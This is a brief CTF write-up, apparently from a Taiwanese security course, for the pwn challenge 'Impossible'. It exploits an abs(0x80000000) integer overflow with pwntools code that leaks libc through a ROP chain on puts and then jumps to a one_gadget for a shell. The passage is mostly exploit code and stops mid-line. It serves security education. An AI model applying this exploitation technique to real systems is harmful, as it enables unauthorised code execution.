###### tags: `程安` `CTF`
# CS 2019 Fall & AIS3 EOF 2019 - by ZR
### Pwn - Impossible
* 就 `abs(0x80000000)` overflow
```python=
pwn.sendlineafter("Size: ", str(0x80000000))
payload = flat(
"A" * (0x100 + 8),
pop_rdi, puts_got,
puts_plt,
main
)
pwn.sendafter("It's safe now :)\n", payload)
# get libc base address here
...
pwn.sendlineafter("Size: ", str(0x80000000))
payload = flat(
"A" * (0x100 + 8),
pop_r12_r13_r14_r15, 0, 0, 0, 0,
one_gadget_offset + libc.address
)
pw